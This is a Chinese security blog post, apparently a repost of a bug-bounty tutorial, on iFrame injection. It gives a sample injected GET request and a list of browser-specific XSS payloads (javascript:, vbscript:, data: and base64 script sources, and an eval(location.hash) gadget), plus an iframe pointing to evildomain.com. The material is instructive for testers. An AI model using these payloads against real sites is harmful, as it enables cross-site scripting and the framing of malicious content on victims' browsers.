专栏首页Timeline SecBUG赏金 | 当我发现iFrame注入时的利用

BUG赏金 | 当我发现iFrame注入时的利用

图片来源于网络

iFrame注入是一种非常常见的跨站脚本攻击。它包括已插入到网页或文章内容的一个或多个iframe代码,或一般下载一个可执行程序或进行其他动作使网站访客的电脑妥协。在最好的情况下,谷歌可能会标注该网站“恶意”。最糟糕的情况是,站点所有者和访问者最终使用了受恶意软件感染的计算机。

iFrame注入发生在当一个脆弱的网页上的iFrame通过一个用户可控输入显示另一个网页。

GET/search.jsp?query=%3Ciframe%20src=%22https://google.com/?%22%3E%3C/iframe%3E HTTP/1.1

不同浏览器使用不同payload:

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

多种利用方式如下:

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

接受用户提供的数据作为iframe源URL可能会导致在Visualforce页面中加载恶意内容。

发生iFrame欺骗漏洞在以下情况:

1、数据通过不可信的源进入web应用程序。

2、数据作为iframe URL使用,而不进行验证。

通过这种方式,如果攻击者向受害者提供设置为恶意网站的iframesrc参数,则该框架将与恶意网站的内容一起呈现。

<iframe src="http://evildomain.com/">

冬至礼物

翻译自https://url.cn/5V7dJlo

本文分享自微信公众号 - Timeline Sec(PaperPenSec),作者:PaperPen

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-12-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • ThinkPHP6.0任意文件创建Getshell复现

    ThinkPHP框架是MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。该漏洞源于ThinkPHP...

    Timeline Sec
  • CVE-2019-16759:vBulletin 5.x未授权RCE复现

    vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS,该CMS国外大量论坛使用,中国国内少许网站使用。近日,vBulletin 5.x爆出一个前台远...

    Timeline Sec
  • CVE-2019-16097:Harbor任意管理员注册漏洞复现

    Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源D...

    Timeline Sec
  • 动态创建iframe标签页并监控其加载成功(onload)的事件

    Jerry Wang
  • ISO手机端的h5界面 alert弹出框 不显示IP地址

    week
  • 前端爬坑日记之vue内嵌iframe并跨域通信

    由于该项目是基于原本的安卓app,做的微信h5,所以原来的使用webview的页面现在需要在vue中实现,那就是使用iframe 查看了很多很多文档,其中这一...

    双面人
  • 工程师笔记|服务器出故障了我却不知道?

    想必大家都经历过手机、电脑等电子设备出问题的情况,跟手机、电脑一样,服务器运转过程中也会出点故障,作为承载了企业各种业务的平台,服务器出故障的影响非同小可,严重...

    用户6543014
  • AI到底能给我们带来什么

    前天晚上举行的Google一年一度的IO大会 向全世界介绍了这一年依赖Google取得的技术成果。

    PhoenixZheng
  • CES2020产品和技术总结 - Audio & Headphones

    2020年大量的新一代TWS产品发布,其价格呈现明显的两极分化。高端产品(premium-end)价格在200美金以上,低端产品(entry level)价格在...

    用户6026865
  • 2018年11月机器学习Github开源项目TOP 10

    在此期间,我们将项目与新的或主要版本进行了比较。Mybridge AI根据各种因素对项目进行排名,以衡量专业人员的质量。

    AiTechYun

扫码关注云+社区

领取腾讯云代金券